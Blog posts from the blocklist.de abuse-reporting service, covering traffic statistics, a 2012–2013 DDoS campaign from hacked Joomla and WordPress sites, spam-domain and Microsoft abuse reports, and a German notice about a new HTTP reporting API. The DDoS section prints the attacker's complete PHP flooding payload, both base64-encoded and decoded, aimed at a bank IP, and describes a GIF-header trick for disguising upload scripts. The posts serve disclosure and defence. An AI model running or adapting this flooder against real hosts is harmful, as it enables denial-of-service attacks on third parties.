Fail2Ban Reporting Service

Currently, blocklist.de has the following Stats/User:

User: 738

Server: 882

Attacks: 187,080,505

Reports: 4,139,547

Daily Mails: ~400100

Web-Traffic: ~60 GB

RBL-/API-Traffic: ~80 GB (all Mirrors)

Mail (In/Out)-Traffic: ~~900 GB

Traffic over IPv6 (Mail, Web..): ~3GB

To this data, there comes 3TB Traffic between the Web-/Mail-Server and the MySQL-Server. The MySQL-Server sends over ~4,7 GB each Hour out.

The Mysql-Server use now 40% from 32GB Ram. And the System-Load is in average on 0.80 .

The WebServer is using not full of 9GB Ram and the System-Load is under 1 (thanks nginx). The open Connections are ~7000

The cpmplete Traffic from all Systems are round about 1,5TB in January 2013.

We seen the first ddos against ns1.google.com and bank of america on 19.09.2012:

https://blog.blocklist.de/2012/09/15/ddos-angriff-auf-ns1-google-com-uber-gehackte-webseiten/

The Hacker abused old installations of „bluestork“-Templates and old WordPress-Sites.

And he upload the complete Script and calls him over get-Parameters to start it.

Then he changed it to upload only html-Forms over old Joomlas < 2.5.7 (most the JCE-Editor was hacked) and use the gif-Failure in php and Skript (the upload-Script has in the first lines a Gif-Header and binary code.

The „file“ Program and Linux says it is an gif-image, but he has after them normal php-code.

Over the Upload-Script, he uploads a small other Script and sends the Data over POST with base64_decode() the complete Data from one of the Post-Data from $_REQUEST[‚mjdu‘] was:


eval(base64" - replace it with _"decode("DQokaWlpPScxNzEuMTYxLjE5OS4xMDAnOw0KJHBwcD0nNDQzJzsNCiRkZGQ9JzM2MDAnOw0KJHNzdHQ9JzMwJzsNCiRycnR0PSc1JzsNCiRwcHNzPSczJzsNCmlmKGZpbGVfZXhpc3RzKCJzdGV4dC50eHQiKS
kNCnsNCgkkZmZwPWZvcGVuKCJzdGV4dC50eHQiLCJyIik7DQoJJHJyPWZyZWFkKCRmZnAsOCk7DQoJZmNsb3NlKCRmZnApOw0KCWlmKCRycj09Ik5vVHRFeFRyVW4iKQ0KCXsNCgkJJGZmcDI9Zm9wZW4oInN0ZXh0LnR4dCIsIncrIik7D
QoJCWZjbG9zZSgkZmZwMik7DQoJCXVubGluaygic3RleHQudHh0Iik7DQoJCWV4aXQoKTsNCgkJZGllKCk7DQoJfQ0KCXVubGluaygic3RleHQudHh0Iik7DQp9DQoNCiRzdGVwX3RpbWU9dGltZSgpKyRzc3R0Ow0KJHJlbGVhc2VfdGlt
ZT10aW1lKCkrJHJydHQ7DQoNCmlmKGlzc2V0KCRfUkVRVUVTVFsndGltZV9lJ10pKQ0Kew0KCSRtYXhfdGltZSA9ICRfUkVRVUVTVFsndGltZV9lJ107DQp9DQplbHNlDQp7DQoJJHRpbWUgPSB0aW1lKCk7DQoJJG1heF90aW1lID0gJHR
pbWUrJGRkZDsNCn0NCgkkb3V0PXN0cl9yZXBlYXQoIi4iLCAkcHBzcyk7DQokZmlyc3QxPTA7DQp3aGlsZSh0aW1lKCkgPCAkbWF4X3RpbWUpDQp7CQ0KCWlmKHRpbWUoKSA+ICRyZWxlYXNlX3RpbWUgJiYgJGZpcnN0MT09MCkNCgl7DQ
oJCSRmaXJzdDE9MTsNCgkJJGFkZHJlc3NfaG9zdD0iaHR0cDovLyIuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiIvIi4kX1NFUlZFUlsnUEhQX1NFTEYnXTsNCgkJJGRhdGExWydtamR1J109JF9SRVFVRVNUWydtamR1J107DQoJCSRkYXRhM
VsncHNidCddPSRfUkVRVUVTVFsncHNidCddOw0KCQkkZGF0YTFbJ3RpbWVfZSddPSRtYXhfdGltZTsNCgkJJGNoMSA9QGN1cmxfaW5pdCgpOw0KCQljdXJsX3NldG9wdCgkY2gxLENVUkxPUFRfVVJMLCRhZGRyZXNzX2hvc3QpOw0KCQlj
dXJsX3NldG9wdCgkY2gxLENVUkxPUFRfU1NMX1ZFUklGWVBFRVIsRkFMU0UpOw0KCQljdXJsX3NldG9wdCgkY2gxLENVUkxPUFRfU1NMX1ZFUklGWUhPU1QsMik7DQoJCWN1cmxfc2V0b3B0KCRjaDEsQ1VSTE9QVF9IRUFERVIsMSk7DQo
JCWN1cmxfc2V0b3B0KCRjaDEsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwwKTsNCgkJY3VybF9zZXRvcHQoJGNoMSxDVVJMT1BUX1RJTUVPVVQsMTApOw0KCQljdXJsX3NldG9wdCgkY2gxLENVUkxPUFRfUE9TVCwgdHJ1ZSk7DQoJCWN1cmx
fc2V0b3B0KCRjaDEsQ1VSTE9QVF9QT1NURklFTERTLCAkZGF0YTEpOw0KCQljdXJsX2V4ZWMoJGNoMSk7DQoJCWN1cmxfY2xvc2UoJGNoMSk7DQoJfQ0KCWlmKHRpbWUoKSA+ICRzdGVwX3RpbWUpDQoJew0KCQlAZXhpdCgpOw0KCQlAZGl
lKCk7DQoJfQ0KCSRzb2NrZXQgPSBAc3RyZWFtX3NvY2tldF9jbGllbnQoInRjcDovLyRpaWk6JHBwcCIsJGVyciwkZXJyMiwxLFNUUkVBTV9DTElFTlRfQVNZTkNfQ09OTkVDVCk7DQoJCWlmICgkc29ja2V0KSANCgkJew0KCQkJQHN0cmV
hbV9zZXRfd3JpdGVfYnVmZmVyKCRzb2NrZXQsIDApOw0KCQkJQHN0cmVhbV9zb2NrZXRfc2VuZHRvKCRzb2NrZXQsJG91dCk7DQoJCX0NCglAZmNsb3NlKCRzb2NrZXQpOzsNCn0NCiRmZnAyPWZvcGVuKCJzdGV4dC50eHQiLCJ3KyIpO2Z
jbG9zZSgkZmZwMik7dW5saW5rKCJzdGV4dC50eHQiKTs="));


encoded it was:


$iii='171.161.199.100';
$ppp='443';
$ddd='3600';
$sstt='30';
$rrtt='5';
$ppss='3';
if(file_exists("stext.txt"))
{
$ffp=fopen("stext.txt","r");
$rr=fread($ffp,8);
fclose($ffp);
if($rr=="NoTtExTrUn")
{
$ffp2=fopen("stext.txt","w+");
fclose($ffp2);
unlink("stext.txt");
exit();
die();
}
unlink("stext.txt");
}
$step_time=time()+$sstt;
$release_time=time()+$rrtt;
 
if(isset($_REQUEST['time_e']))
{
$max_time = $_REQUEST['time_e'];
}
else
{
$time = time();
$max_time = $time+$ddd;
}
$out=str_repeat(".", $ppss);
$first1=0;
while(time() < $max_time)
{
if(time() > $release_time && $first1==0)
{
$first1=1;
$address_host="http://".$_SERVER['HTTP_HOST']."/".$_SERVER['PHP_SELF'];
$data1['mjdu']=$_REQUEST['mjdu'];
$data1['psbt']=$_REQUEST['psbt'];
$data1['time_e']=$max_time;
$ch1 =@curl_init();
curl_setopt($ch1,CURLOPT_URL,$address_host);
curl_setopt($ch1,CURLOPT_SSL_VERIFYPEER,FALSE);
curl_setopt($ch1,CURLOPT_SSL_VERIFYHOST,2);
curl_setopt($ch1,CURLOPT_HEADER,1);
curl_setopt($ch1,CURLOPT_RETURNTRANSFER,0);
curl_setopt($ch1,CURLOPT_TIMEOUT,10);
curl_setopt($ch1,CURLOPT_POST, true);
curl_setopt($ch1,CURLOPT_POSTFIELDS, $data1);
curl_exec($ch1);
curl_close($ch1);
}
if(time() > $step_time)
{
@exit();
@die();
}
$socket = @stream_socket_client("tcp://$iii:$ppp",$err,$err2,1,STREAM_CLIENT_ASYNC_CONNECT);
if ($socket)
{
@stream_set_write_buffer($socket, 0);
@stream_socket_sendto($socket,$out);
}
@fclose($socket);;
}
$ffp2=fopen("stext.txt","w+");fclose($ffp2);unlink("stext.txt");


Why he use:
@exit();
and
@die();
one of them are enough 😉 die() is the same like exit() ->
function die on php.net

There was better code after the first script, in which he has curl-functions again and again. For this code you usually uses functionals to deduce double code 🙂

on the 22.01.2013 we found over 250 abused Joomla-Installations.

Today (25.01.2013) he hacks Joomla Installations with a Version under 2.5.8 and WordPress with older Plugins like akisment version 2.5.5.

Is is necessary to update your Installations very fast or your Server attacks us-financial institutions 🙂

Think about over 250 hacked sites on Servers from only one hoster to create a ddos, you have a lot of power and bandwidth and we think in the world, there a very large numbers of old Joomla-Installations on Servers 🙂

In the last Days and Weeks, we get a very large List of SEO-/Spam-URLs with .pl-Domains like this:

http://38291.8gx5zj6a7.pl/

http://20851.y5pcbti2p.pl/

http://10533.m6lkmh37r.pl/

http://35754.igzkbz6j1.pl/

Now the Spamer has changed the Server. The Domains linked now to the IP 178.33.177.193 hosted on OVH-System.

We send for the Spam-URLs a X-ARF-Report via spamlinks.blocklist.de to the Abuse-Department to look at the the Spam-URL. We send only a Report, when the Spam-Score is high enough. So, the false-positive rate is under 5%.

We recommd to block the IP in all Firewalls and Gateways.

In the last Days we see 13 IPs from the Network MICROSOFT-CORP—MSN-AS-BLOCK – Microsoft Corp // ASN8075 from a lot of Forum-Spam-/SSH-/Voip-/SIP-Attacks.

We send the default X-ARF-Abuse-Complaint, but only the Server which makes SSH-/Sip-Attacks was stoped or not longer reported to us.

So, we send a normal Mail to noc@microsoft.com, abuse@microsoft… abuse@msn…. but received only the acknowledgement-Mail and a bounce-Mail from noc@ that the account does not exist, but is aviable in the Whois-Data.

On the Server there are the rdp-Port open:

We thinking there are Developement-Systems there was hacked or false configured, that he have a (Reverse)Proxy which allows to get URLs from other URLs and not only from the same system.

Some IPs was heavy, like this IP 157.56.166.51 he has send over 760400 Spam-Comments/Posts or automatically Registrations in Honeypot-Systems. The most IPs was stopped or was never reported to us after yesterday, but one IP is still alive.

We wait for a Answer from microsoft so far 😐

[UPDATE 22.07.2013 11:00:00]
We received an Anser from Microsoft:
 


Hello,

Rechie
Online Safety Team


We have try to send a Report, but get only the following error-message:
An internal error has occured, please try again. Object reference not set to an instance of an object.
With an fake Referer, the Form works.
But dear Microsoft, please use a X-ARF-Parser and generate a new Report with your own format from your Form.

Wir haben soeben die BETA für die HTTP-API online gestellt:

http://www.blocklist.de/de/httpreports.html

Darüber kann man mit z.B. curl/lynx/wget die Daten an BlockList.de melden und braucht kein Mailsystem auf dem Server zu installieren.

Es benötigt zum aufrufen folgende Daten:

• Server-E-Mailadresse oder ID
• Server-API-Key
• Attacker-IP
• angegriffener Dienst (ssh, imap, ftp….)
• Logfiles
• format (xml, json, text, php)

Dann kann man die Daten per POST/GET absenden:

curl -s „http://www.blocklist.de/de/httpreports.html?server=$email@server.tld&apikey=$apikey&ip=$angreiferIP&service=$dienst&logs=urlencode($logs)&format=php“

Je nach dem, wie das Rückgabe-Format ist, hat man die Variablen status und error:

xml:

<status>success</status>

<error>0</error>

Wenn status den Inhalt success, dann hat alles gepasst.

Ansonsten ist die Variable $error nicht 0 und hat man hat je nach Fehler-Art diese in $error enthalten:

<server>API-Key stimmt nicht mit dem Server ueberein.</server>

<status>error</status>

Da es noch nicht wirklich erprobt ist und bisher nur von mir getestet wurde, kann es noch Bugs geben. Bitte alle Bugs oder Wünsche daher an uns melden. Danke!